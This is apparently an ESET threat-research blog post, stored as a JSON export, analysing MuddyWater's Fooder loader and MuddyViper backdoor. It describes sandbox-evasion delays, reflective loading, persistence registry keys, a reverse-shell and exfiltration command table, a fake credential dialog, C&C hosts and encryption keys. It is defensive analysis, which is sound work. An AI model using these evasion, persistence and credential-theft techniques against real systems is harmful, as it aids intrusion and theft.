{"id":9053,"date":"2025-12-02T12:00:00","date_gmt":"2025-12-02T10:00:00","guid":{"rendered":"https:\/\/blog.eset.ee\/et\/?p=9053"},"modified":"2026-06-14T20:08:18","modified_gmt":"2026-06-14T17:08:18","slug":"muddywater-snakes-by-the-riverbank","status":"publish","type":"post","link":"https:\/\/blog.eset.ee\/et\/en\/2025\/12\/02\/muddywater-snakes-by-the-riverbank\/","title":{"rendered":"MuddyWater: Snakes by the riverbank"},"content":{"rendered":"<p>ESET researchers have identified new MuddyWater activity primarily targeting organizations in Israel, with one confirmed target in Egypt. MuddyWater, also referred to as Mango Sandstorm or TA450, is an Iran-aligned cyberespionage group known for its persistent targeting of government and critical infrastructure sectors, often leveraging custom malware and publicly available tools. In this campaign, the attackers deployed a set of previously undocumented, custom tools with the objective of improving defense evasion and persistence. Among these tools is a custom Fooder loader designed to execute MuddyViper, a C\/C++ backdoor. Several versions of Fooder masquerade as the classic Snake game, and its internal logic includes a custom delay function inspired by the game\u2019s mechanics, combined with frequent use of <span>Sleep<\/span> API calls. These features are intended to delay execution and hinder automated analysis. MuddyViper enables the attackers to collect system information, execute files and shell commands, transfer files, and exfiltrate Windows login credentials and browser data. 
The campaign also leverages credential stealers (CE\u2011Notes and LP\u2011Notes) and reverse tunneling tools (go\u2011socks5), long a favorite of MuddyWater operators.<\/p>\n<p>Although this is our first public blogpost covering MuddyWater, ESET researchers have been tracking the group for several years and have documented its activities in multiple <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q2-2023-q3-2023.pdf\">ESET<\/a> <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q4-2023-q1-2024.pdf\">APT<\/a> <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q2-2024-q3-2024.pdf\">Activity<\/a> <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q4-2024-q1-2025.pdf\">Reports<\/a>. Unlike previous campaigns of MuddyWater, which were often noisy and easily detected, the one covered in this blogpost demonstrates a more focused, sophisticated, and refined approach.<\/p>\n<blockquote>\n<div><strong>Key points of this blogpost:<\/strong><\/div>\n<ul>\n<li>MuddyWater developers adopted CNG, the next-generation Windows cryptographic API, which is unique among Iran-aligned groups and somewhat atypical across the broader threat landscape.<\/li>\n<li>The group also used a more advanced technique to deploy MuddyViper, a new backdoor: a loader (Fooder) that reflectively loads it into memory and executes it.<\/li>\n<li>We provide technical analyses of the tools used in this campaign, including MuddyViper, the Fooder loader, the CE-Notes browser-data stealer, the LP-Notes credential stealer, the Blub browser-data stealer, and go\u2011socks5 reverse tunnels.<\/li>\n<li>During this campaign, the operators deliberately avoided hands-on-keyboard interactive sessions, which is a historically noisy technique often characterized by mistyped 
commands.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>MuddyWater group overview<\/h2>\n<p>MuddyWater is a cyberespionage group active since at least 2017, primarily targeting entities in the Middle East and North America. It is one of the most active Iran-aligned APT groups tracked by ESET researchers and has <a href=\"https:\/\/attack.mitre.org\/groups\/G0069\/\">links to the Ministry of Intelligence and National Security of Iran<\/a>.<\/p>\n<p>The group was first introduced to the public as MuddyWater by <a href=\"https:\/\/unit42.paloaltonetworks.com\/unit42-muddying-the-water-targeted-attacks-in-the-middle-east\/\">Unit 42<\/a> in 2017, whose description of the group\u2019s activity is consistent with ESET\u2019s profiling \u2013 a focus on cyberespionage, the use of malicious documents as attachments designed to prompt users to enable macros and bypass security controls, and a primary targeting of entities located in the Middle East.<\/p>\n<p>Notable past activities include <a href=\"https:\/\/www.clearskysec.com\/wp-content\/uploads\/2020\/10\/Operation-Quicksand.pdf\">Operation Quicksand<\/a> (2020), a cyberespionage campaign targeting Israeli government entities and telecommunications organizations, which exemplifies the group\u2019s evolution from basic phishing tactics to more advanced, multistage operations; and a <a href=\"https:\/\/www.clearskysec.com\/muddywater-targets-kurdish-groups-turkish-orgs\/\">campaign targeting political groups and organizations in T\u00fcrkiye<\/a>, demonstrating the group\u2019s geopolitical focus, its ability to adapt social engineering tactics to local contexts, and reliance on modular malware and flexible C&amp;C infrastructure.<\/p>\n<p>Besides its frequent activity, MuddyWater operations are often noisy. 
The group is known for its persistent targeting of government, military, telecommunications, and critical infrastructure sectors, typically using custom malware and publicly available tools to gain access, maintain persistence, and exfiltrate sensitive data. In addition to targeting its archenemy, Israel, the group appears to be targeting countries that maintain, or seek to strengthen, diplomatic ties with Iran.<\/p>\n<p>ESET has documented multiple campaigns attributed to MuddyWater that highlight the group\u2019s evolving toolset and shifting operational focus. While the earlier operations relied on broad targeting and relatively unsophisticated techniques, more recent campaigns demonstrate signs of technical refinement and increased precision.<\/p>\n<p>In March and April 2023, MuddyWater <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q2-2023-q3-2023.pdf\">targeted an unidentified victim in Saudi Arabia<\/a> by deploying a batch script that downloaded a PowerShell-based backdoor, which was used to download and execute arbitrary payloads and subsequently to remove the initial payload from disk.<\/p>\n<p>The group conducted a <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q4-2024-q1-2025.pdf\">campaign in January and February 2025<\/a> that was notable for its operational overlap with Lyceum (an OilRig subgroup), further detailed in this publication. 
This latest overlap suggests an evolution in MuddyWater\u2019s modus operandi.<\/p>\n<p>The group\u2019s publicly documented custom tools include, for example, the <a href=\"https:\/\/www.gov.il\/BlobFolder\/reports\/maddy_water_2024\/en\/ALERT_CERT_IL_W_1858.pdf\">Bugsleep, Blackout<\/a>, <a href=\"https:\/\/www.cisa.gov\/news-events\/cybersecurity-advisories\/aa22-055a\">Small Sieve, Mori, and POWERSTATS backdoors<\/a>, as well as custom-compiled variants of <a href=\"https:\/\/www.security.com\/threat-intelligence\/seedworm-espionage-group\">open-source tools<\/a> such as <a href=\"https:\/\/github.com\/AlessandroZ\/LaZagne\">LaZagne<\/a> or <a href=\"https:\/\/github.com\/byt3bl33d3r\/CrackMapExec\">CrackMapExec<\/a>. MuddyWater campaigns typically do not leverage or introduce new tools, malware, or techniques; instead, they are often noteworthy due to the targeting.<\/p>\n<p>While MuddyWater initially concentrated strictly on cyberespionage, its cooperation with Lyceum led to targeting of the manufacturing sector through spearphishing. The attack generated considerable noise and achieved little in terms of operational objectives.<\/p>\n<p>The campaign outlined in this publication shows what, for MuddyWater, seems to be an unprecedented advancement in toolset and technical execution.<\/p>\n<h3>Victimology<\/h3>\n<p>As previously mentioned, during this campaign, MuddyWater primarily targeted organizations in Israel, but also one in Egypt. Table 1 lists the victims by country and vertical. The campaign began on September 30<sup>th<\/sup>, 2024 and concluded on March 18<sup>th<\/sup>, 2025.<\/p>\n<p><a><\/a><em>Table 1. 
Victims by country and vertical<\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"190\"><strong>Country<\/strong><\/td>\n<td width=\"453\"><strong>Vertical<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"190\"><strong>Egypt<\/strong><\/td>\n<td width=\"453\">Technology<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"17\" width=\"190\"><strong>Israel<\/strong><\/td>\n<td width=\"453\">Engineering #1<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Engineering #2<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Engineering #3<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Local Government #1<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Local Government #2<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Manufacturing<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Technology<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Transportation<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Utilities<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">University #1<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">University #2<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">University #3<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Unidentified #1<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Unidentified #2<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Unidentified #3<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Unidentified #4<\/td>\n<\/tr>\n<tr>\n<td width=\"453\">Unidentified #5<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>One interesting thing to note about the victim in the utilities vertical is that they were also compromised by Lyceum on February 11<sup>th<\/sup>, 2025.<\/p>\n<h4>Overlap and cooperation with Lyceum<\/h4>\n<p>In early 2025, ESET Research identified an operational overlap between MuddyWater and <a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes\/\">Lyceum, a subgroup of the Iran-aligned OilRig cyberespionage group<\/a>, also known as HEXANE or Storm-0133. 
OilRig has been active since at least 2014 and is <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset_threat_report_t32021.pdf\">commonly believed to be based in Iran<\/a>. Tools that we attribute to Lyceum include DanBot, Shark, Milan, Marlin, Solar, Mango, OilForceGTX, and <a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/oilrig-persistent-attacks-cloud-service-powered-downloaders\/\">a variety of downloaders<\/a> that leverage legitimate cloud services for C&amp;C communication. We have previously observed Lyceum targeting multiple Israeli organizations, including national and local governmental entities, as well as organizations in the healthcare sector.<\/p>\n<p>During the campaign covered here, MuddyWater conducted a joint sub-campaign with OilRig in January and February 2025. MuddyWater initiated access through a spearphishing email containing a link to an installer for the <a href=\"https:\/\/syncromsp.com\/\">Syncro<\/a> remote monitoring and management (RMM) software. Following the initial compromise, the attackers installed an additional RMM tool, <a href=\"https:\/\/www.pdq.com\/\">PDQ<\/a>, and deployed a custom Mimikatz loader disguised as certificate files with <span>.txt<\/span> file extensions. Based on the observed activity, harvested credentials were probably used by Lyceum to gain access and assume control of operations within the targeted manufacturing-sector organization in Israel.<\/p>\n<p>This cooperation suggests that MuddyWater may be acting as an initial access broker for other Iran-aligned groups.<\/p>\n<h3>Attribution<\/h3>\n<p>The victimology, TTPs, and tooling observed in this campaign align with several of the newly documented capabilities and tools that we have previously attributed to MuddyWater. 
This assessment is based on the initial access method and the subsequent delivery of malicious tools \u2013 generally via spearphishing emails that contain links to download RMM software.<\/p>\n<h4>TTPs<\/h4>\n<p>MuddyWater operators continue to rely on predictable and script-based backdoors written in PowerShell and Go. Their targeting remains focused on the telecommunications, governmental, and oil and energy sectors.<\/p>\n<p>Initial access is typically achieved through spearphishing emails, often containing PDF attachments that link to installers for RMM software hosted on free file-sharing platforms such as OneHub, Egnyte, or Mega. These links lead to the download of RMM tools including Atera, Level, PDQ, and SimpleHelp.<\/p>\n<p>Among the tools deployed by MuddyWater operators is also the VAX\u2011One backdoor, named after the legitimate software which it impersonates: Veeam, AnyDesk, Xerox, and the OneDrive updater service.<\/p>\n<p>The group\u2019s continued reliance on this familiar playbook makes its activity relatively easy to detect and block.<\/p>\n<h4>Tools overlap<\/h4>\n<p>Additionally, we identified code overlaps between several of the newly documented tools and those we previously attributed to MuddyWater:<\/p>\n<ul>\n<li>LP-Notes, a new credential stealer, has the same design as CE-Notes, a browser-data stealer, that we previously associated with MuddyWater. During this campaign, we also observed a Mimikatz loader, which shares the same design and obfuscation methods as CE-Notes.<\/li>\n<li>We observed several new variants of MuddyWater\u2019s customized go\u2011socks5 reverse tunnels, which <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-apt-activity-report-q4-2024-q1-2025.pdf\">the group used throughout 2024 and 2025<\/a>.<\/li>\n<li>In two instances, we observed the customized go\u2011socks5 reverse tunnels embedded in a new MuddyWater loader, internally named Fooder. 
In a dozen other cases, this loader was used to load MuddyWater\u2019s new backdoor, MuddyViper.<\/li>\n<li>Interestingly, MuddyViper and the CE-Notes\/LP-Notes\/Mimikatz loader variants use the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/seccng\/cng-portal\">CNG API<\/a> for data encryption and decryption. To the best of our knowledge, this is unique among Iran-aligned groups. Another trait these tools share is that they attempt to steal user credentials by opening a fake Windows Security dialog.<\/li>\n<\/ul>\n<h2>Toolset<\/h2>\n<p>In this blogpost, we document previously unknown, custom tools used by MuddyWater:<\/p>\n<ul>\n<li>Fooder loader \u2013 a newly identified loader that loads the MuddyViper backdoor into memory and executes it. Note that several versions of Fooder masquerade as the classic Snake game, hence the designation MuddyViper. Another notable characteristic of Fooder is its frequent use of a custom delay function that implements the core logic of the Snake game, combined with <span>Sleep<\/span> API calls. These features are intended to delay execution in an attempt to hide malicious behavior from automated analysis systems.<\/li>\n<li>MuddyViper backdoor \u2013 a previously undocumented C\/C++ backdoor that enables attackers to collect system information, download and upload files, execute files and shell commands, and steal Windows credentials and browser data.<\/li>\n<\/ul>\n<p>The rest of the toolset documented in this blogpost includes:<\/p>\n<ul>\n<li>CE-Notes, a browser-data stealer,<\/li>\n<li>LP-Notes, a credential stealer,<\/li>\n<li>Blub, a browser-data stealer, and<\/li>\n<li>several go\u2011socks5 reverse tunnels.<\/li>\n<\/ul>\n<h3>Fooder loader<\/h3>\n<p>Fooder is a 64-bit C\/C++ loader designed to decrypt and then reflectively load the embedded payload (as illustrated in Figure 1), with MuddyViper being the most frequently observed payload.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 1. 
Relationships between Fooder and its launcher and payload\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-1.png\" title=\"Figure 1. Relationships between Fooder and its launcher and payload\" width=\"\"><figcaption><em>Figure 1. Relationships between Fooder and its launcher and payload<\/em><\/figcaption><\/figure>\n<p>Fooder seems to be the internal name of this tool, based on its PDB paths:<\/p>\n<ul>\n<li><span>C:\\Users\\win\\Desktop\\Fooder\\Debug\\Launcher.pdb<\/span><\/li>\n<li><span>C:\\Users\\pc\\Desktop\\main\\My_Project\\Fooder\\x64\\Debug\\Launcher.pdb<\/span><\/li>\n<\/ul>\n<p>Although we have captured only one sample of it, we believe that Fooder is executed by a simple launcher application written in C. It has no string obfuscation, logs verbosely to the console, and ships with its PDB path left intact:<\/p>\n<p><span>C:\\Users\\pc\\source\\repos\\ConsoleApplication7\\x64\\Release\\ConsoleApplication7.pdb<\/span><\/p>\n<p>We have observed one instance (SHA-1: <span>76632910CF67697BF5D7285FAE38BFCF438EC082<\/span>) of this launcher. Deployed under the name <span>%USERPROFILE%\\Downloads\\OsUpdater.exe<\/span>, the launcher expects a process ID as a command line argument. 
Once executed, it attempts to duplicate the token of the specified process via the <span>DuplicateTokenEx<\/span> API, and then uses <span>CreateProcessAsUserA<\/span> to execute Fooder in that process\u2019s security context.<\/p>\n<p>Once executed, Fooder decrypts the embedded payload following these steps:<\/p>\n<ul>\n<li>The command line argument (<span>6<\/span>) is added to each byte of a hardcoded key, producing the AES decryption key <span>6969697820511281801712341067111416133321394945138510872296106446<\/span>, which is shared across all samples.<\/li>\n<li>A hardcoded value (<span>5<\/span>) is subtracted from each byte of the embedded payload.<\/li>\n<li>Finally, the result is decrypted with the AES key using the WinCrypt API (note that Fooder relies on the legacy CryptoAPI here, whereas MuddyViper itself uses CNG).<\/li>\n<\/ul>\n<p>Fooder then maps the decrypted payload into memory itself (reflective loading), so the payload runs without passing through the Windows image loader and without ever being written to disk.<\/p>\n<p>Besides MuddyViper, Fooder has been used to deliver <a href=\"https:\/\/github.com\/moonD4rk\/HackBrowserData\">HackBrowserData<\/a>, an open-source utility capable of decrypting and exporting sensitive browser information such as credentials and cookies. Fooder also facilitates the deployment of go\u2011socks5 variants, which are Go-compiled binaries that function as reverse tunnels, enabling attackers to bypass firewalls and Network Address Translation (NAT) mechanisms. Notably, the MuddyWater group has previously utilized go\u2011socks5 independently of Fooder, indicating a continued reliance on this tool for stealthy network communication and data exfiltration.<\/p>\n<p>Note that several versions of Fooder masquerade as the Snake game (see the strings and mutexes highlighted in Figure 2), which is what gave its most frequently embedded payload the name MuddyViper.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 2. 
Multiple Fooder instances masquerade as the Snake game\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-2.png\" title=\"Figure 2. Multiple Fooder instances masquerade as the Snake game\" width=\"\"><figcaption><em>Figure 2. Multiple Fooder instances masquerade as the Snake game<\/em><\/figcaption><\/figure>\n<p>Another notable characteristic of Fooder is its frequent use of a custom delay function, combined with <span>Sleep<\/span> API calls. The function implements the core loop of the <a href=\"https:\/\/en.wikipedia.org\/wiki\/Snake_(video_game_genre)\">Snake game<\/a> (where the player steers the head of a growing line, usually drawn as a snake, around obstacles to collect items): every move of the game is driven by a loop that waits briefly before the next update, so calling the function repeatedly stalls execution. These delays slow the loader down and help it evade sandboxes that observe a process only for a short time or that flag rapid malicious activity. Figure 3 highlights the delays and the Snake game welcome banner presented to the user at runtime.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 3. Various calls to delay execution are dispersed throughout Fooder\u2019s code\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-3.png\" title=\"Figure 3. Various calls to delay execution are dispersed throughout Fooder\u2019s code\" width=\"\"><figcaption><em>Figure 3. Various calls to delay execution are dispersed throughout Fooder\u2019s code<\/em><\/figcaption><\/figure>\n<p>Fooder does not have any built-in persistence capability. 
However, in cases when Fooder\u2019s final payload is the MuddyViper backdoor, the backdoor can set up persistence for the loader via a scheduled task or the Startup folder.<\/p>\n<h3>MuddyViper backdoor<\/h3>\n<p>MuddyViper, a previously undocumented backdoor written in C and C++, gives the attackers covert access to, and control over, compromised systems. We have observed MuddyViper only in memory, loaded by Fooder, which may explain why it has no obfuscation or string encryption. As is typical for MuddyWater, MuddyViper sends extremely verbose and frequent status messages to its C&amp;C server throughout its execution, such as the following:<\/p>\n<ul>\n<li><span>[+] Persist: &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; Hi,I am Live &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/span><\/li>\n<li><span>[+] Persist: &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; Hi,First Time &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/span><\/li>\n<li><span>[-] Persist: failed Create task !!!!<\/span><\/li>\n<\/ul>\n<p>The backdoor also keeps a lengthy list of 150+ process names and details about the respective products to be able to send detailed reports about the security tools detected in the compromised environment, even though adding the details could have been easily implemented on the server side:<\/p>\n<ul>\n<li><span>[&gt;] Process: aciseagent.exe ~~&gt; (Cisco Umbrella Roaming Security) &#8211;&gt; (Security DNS) found!<\/span><\/li>\n<li><span>[&gt;] Process: acnamagent.exe ~~&gt; (Absolute Persistence) &#8211;&gt; (Asset Management) found!<\/span><\/li>\n<li><span>[&gt;] Process: acnamlogonagent.exe ~~&gt; (Absolute Persistence) &#8211;&gt; (Asset Management) found!<\/span><\/li>\n<\/ul>\n<p>This behavior results in substantial network traffic.<\/p>\n<p>MuddyViper has two methods of establishing persistence:<\/p>\n<ul>\n<li>Its installation directory can be configured as a Windows Startup folder, by setting the following registry values to 
<span>%APPDATALOCAL%MicrosoftWindowsPPBCompatCacheManagerCache<\/span>:\n<ul>\n<li><span>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup<\/span><\/li>\n<li><span>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup<\/span><\/li>\n<\/ul>\n<\/li>\n<li>A scheduled task named <span>ManageOnDriveUpdater<\/span> can launch MuddyViper from that path at each system start.<\/li>\n<\/ul>\n<p>MuddyViper supports 20 backdoor commands \u2013 see Table 2 for details of all of them \u2013 notably including the ability to open and operate reverse shells, download, upload, and execute files, report the running security tools, steal user credentials and data from a variety of browsers, set up its own persistence, and uninstall itself.<\/p>\n<p><em>Table 2. MuddyViper backdoor commands<\/em><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<thead>\n<tr>\n<td><strong>ID<\/strong><\/td>\n<td><strong>Arguments<\/strong><\/td>\n<td><strong>Action<\/strong><\/td>\n<td><strong>Response<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><span>200<\/span><\/td>\n<td>N\/A<\/td>\n<td>N\/A<\/td>\n<td><span>0<\/span>, via the <span>GET \/adad<\/span> or <span>GET \/aq36<\/span> request, to obtain a backdoor command.<\/td>\n<\/tr>\n<tr>\n<td><span>207<\/span><\/td>\n<td>N\/A<\/td>\n<td>Decrypts the embedded <a href=\"https:\/\/github.com\/moonD4rk\/HackBrowserData\">HackBrowserData<\/a> tool and reflectively loads it in a new thread. 
This open-source tool can steal credentials, history, and other information from web browsers.<br \/>MuddyViper then compresses the collected data (into a file named <span>CacheDump.zip<\/span>) and uploads it to the C&amp;C server.<\/td>\n<td>Collected browser data, via the <span>GET \/mq65<\/span> request.<br \/>In case of an error, a custom status message is sent instead.<\/td>\n<\/tr>\n<tr>\n<td><span>300<\/span><\/td>\n<td><span>&lt;command_line&gt;<\/span><\/td>\n<td rowspan=\"3\">Launches a reverse shell using:\n<div> \u2022 the provided command line (command ID <span>300<\/span>)<\/div>\n<div> \u2022 <span>C:\\windows\\system32\\cmd.exe<\/span> (command ID <span>301<\/span>)<\/div>\n<div> \u2022 <span>C:\\windows\\system32\\WindowsPowerShell\\v1.0\\Powershell.exe<\/span> (command ID <span>302<\/span>)<\/div>\n<div>Then, in a loop, uploads the process output to the C&amp;C server and interprets the server response (see command IDs <span>350-352<\/span>) until interrupted.<\/div>\n<\/td>\n<td rowspan=\"6\">Process output, via the <span>GET \/oi32<\/span> request.<br \/>In case of an error, a custom status message is sent instead.<\/td>\n<\/tr>\n<tr>\n<td><span>301<\/span><\/td>\n<td>N\/A<\/td>\n<\/tr>\n<tr>\n<td><span>302<\/span><\/td>\n<td>N\/A<\/td>\n<\/tr>\n<tr>\n<td><span>350<\/span><\/td>\n<td>N\/A<\/td>\n<td>Must follow command IDs <span>300-302<\/span>. Sleeps for a preconfigured amount of time \u2013 for the reverse shell loop, the default is one second.<\/td>\n<\/tr>\n<tr>\n<td><span>351<\/span><\/td>\n<td>Sleep time (in milliseconds)<\/td>\n<td>Must follow command IDs <span>300-302<\/span>. Configures the sleep time for the reverse shell loop \u2013 the default is one second.<\/td>\n<\/tr>\n<tr>\n<td><span>352<\/span><\/td>\n<td>Input for the reverse shell.<\/td>\n<td>Must follow command IDs <span>300-302<\/span>. 
Passes the provided argument to the running reverse shell.<\/td>\n<\/tr>\n<tr>\n<td><span>360<\/span><\/td>\n<td>N\/A<\/td>\n<td>Not implemented, likely related to the reverse shell API.<\/td>\n<td>A custom error message:<br \/><span>[-] Agent does not have an active pipe<\/span><\/td>\n<\/tr>\n<tr>\n<td><span>400<\/span><\/td>\n<td>Flag.<\/td>\n<td>Must follow command ID <span>401<\/span>. It confirms that the C&amp;C server has successfully received a part of the exfiltrated local file. Optionally adjusts the sleep before the next upload specified in command ID <span>401<\/span> to 10 seconds.<\/td>\n<td>No response, unless this command is issued outside of a pending file upload process, it sends a custom error message:<br \/><span>[-] Agent does not have an DOWNLOAD file<\/span><\/td>\n<\/tr>\n<tr>\n<td><span>401<\/span><\/td>\n<td>Sleep time (in milliseconds), filename.<\/td>\n<td>Initiates a file upload operation from the specified local file to the C&amp;C server in chunks, with the specified sleep time between each upload.<\/td>\n<td>Contents of the specified file, via a series of <span>GET \/dadw<\/span> requests.<\/td>\n<\/tr>\n<tr>\n<td><span>500<\/span><\/td>\n<td>Data chunk.<\/td>\n<td>Must follow command ID <span>501<\/span>. Writes the received data chunk into a previously created and opened local file.<\/td>\n<td>A custom error message, if the operation fails.<\/td>\n<\/tr>\n<tr>\n<td><span>501<\/span><\/td>\n<td>Sleep time (in milliseconds), filename.<\/td>\n<td>Downloads a file from the C&amp;C server in chunks into a local file with the specified name. The specified sleep time is used as a delay after downloading each data chunk. 
Deletes the file if the connection cannot be established after six consecutive attempts.<\/td>\n<td>A series of <span>GET \/dadwqa<\/span> requests, to request the file contents.<\/td>\n<\/tr>\n<tr>\n<td><span>700<\/span><\/td>\n<td>Sleep time (in milliseconds)<\/td>\n<td>Configures the sleep time between connection attempts to the specified value (default is 60 seconds).<\/td>\n<td>N\/A<\/td>\n<\/tr>\n<tr>\n<td><span>800<\/span><\/td>\n<td>N\/A<\/td>\n<td>Enumerates running processes, searching for selected security tools from an extensive hardcoded list.<\/td>\n<td>For each detected process, sends a report with the following information, populated from that hardcoded table:<br \/><span>[&gt;] Process: &lt;process_name&gt; ~~&gt; (&lt;product_name&gt;) &#8211;&gt; (&lt;category&gt;) found!<\/span><\/td>\n<\/tr>\n<tr>\n<td><span>805<\/span><\/td>\n<td>Timeout (in milliseconds)<\/td>\n<td>Displays a fake Windows Security dialog (see Figure 4), prompting the user to fill in credentials, which are then exfiltrated to the C&amp;C server. Uses the provided argument as a timeout for the dialog.<\/td>\n<td>Collected credentials, via the <span>GET \/rq13<\/span> request:<br \/><span>[+] creds ~~&gt; Username:&lt;username&gt; ~~&gt; Password:&lt;password&gt;<\/span><br \/>If not successful, a custom error message is sent instead.<\/td>\n<\/tr>\n<tr>\n<td><span>806<\/span><\/td>\n<td>N\/A<\/td>\n<td>Sets up persistence via a scheduled task named <span>ManageOnDriveUpdater<\/span>. The backdoor copies itself to its installation path, unless it is already running from there.<\/td>\n<td>A custom status message, depending on the outcome of the operation.<\/td>\n<\/tr>\n<tr>\n<td><span>900<\/span><\/td>\n<td>N\/A<\/td>\n<td>Uninstalls itself. 
First, clears persistence set via a Windows Startup Folder and then deletes itself.<br \/>Note that this action will not clear the persistence via a scheduled task that can be set by the backdoor command ID <span>806<\/span>.<\/td>\n<td>A custom status message, depending on the outcome of the operation.<\/td>\n<\/tr>\n<tr>\n<td><span>905<\/span><\/td>\n<td>N\/A<\/td>\n<td>Terminates the current backdoor process.<\/td>\n<td>N\/A<\/td>\n<\/tr>\n<tr>\n<td><span>906<\/span><\/td>\n<td>N\/A<\/td>\n<td>Relaunches itself (via the <span>CreateProcessW<\/span> API) and terminates the current process.<\/td>\n<td>A custom status message, depending on the outcome of the operation.<\/td>\n<\/tr>\n<tr>\n<td>other<\/td>\n<td>N\/A<\/td>\n<td>N\/A<\/td>\n<td><span>[-] Agent statusCode I don&#8217;t have it<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>One of the commands listed in Table 2, with ID <span>805<\/span>, displays a fake Windows Security dialog in an attempt to entice the victim into filling in their Windows credentials, as seen in Figure 4. A similar technique is used by MuddyWater\u2019s LP-Notes stealer (see <em><a href=\"#LP-Notes%20credential%20stealer\">LP-Notes credential stealer<\/a><\/em>).<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 4. Fake Windows Security dialog displayed by MuddyViper (command ID 805)\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/11-25\/muddywater\/figure-4.png\" title=\"Figure 4. Fake Windows Security dialog displayed by MuddyViper (command ID 805)\" width=\"\"><figcaption><em>Figure 4. 
Fake Windows Security dialog displayed by MuddyViper (command ID <\/em><span>805<\/span><em>)<\/em><\/figcaption><\/figure>\n<p>Another command, with ID <span>900<\/span>, aims to remove MuddyViper from the compromised machine and clear its persistence; however, it only clears the Startup folder persistence and leaves the <span>ManageOnDriveUpdater<\/span> scheduled task (command ID <span>806<\/span>) in place, so the command does not remove all traces of the backdoor.<\/p>\n<h4>Network protocol<\/h4>\n<p>To communicate with its C&amp;C server, MuddyViper uses HTTP GET requests (via the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/winhttp\/about-winhttp\">WinHTTP API<\/a>) over port <span>443<\/span>, with the <span>WINHTTP_FLAG_SECURE<\/span> flag set so that the connection uses SSL\/TLS. Two C&amp;C servers have been observed: <span>processplanet[.]org<\/span> and <span>35.175.224[.]64<\/span>.<\/p>\n<p>Data in both directions is AES-CBC encrypted using the CNG API, with a key shared across samples, <span>0608101047106453101617106423101013101012101083109710108585106969<\/span>, and the IV <span>0<\/span>.<\/p>\n<p>In the backdoor \u2192 server direction of the communications:<\/p>\n<ul>\n<li>Each URI path supported by the C&amp;C server is used by the backdoor for one specific type of request, such as requesting a command, uploading a file, or sending a custom status message.<\/li>\n<li>Additional data for the C&amp;C server is included in the HTTP request body, which is unconventional for HTTP GET requests.<\/li>\n<li>The <span>User-Agent<\/span> string is <span>A WinHTTP Example Program\/1.0<\/span>, a remnant of the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/winhttp\/nf-winhttp-winhttpopen#examples\">example code<\/a> for the WinHttpOpen API and therefore a convenient network indicator.<\/li>\n<li>The connection, send, receive, and response timeouts are set to 30 seconds.<\/li>\n<li>Default sleep time between consecutive connection attempts is 60 seconds. 
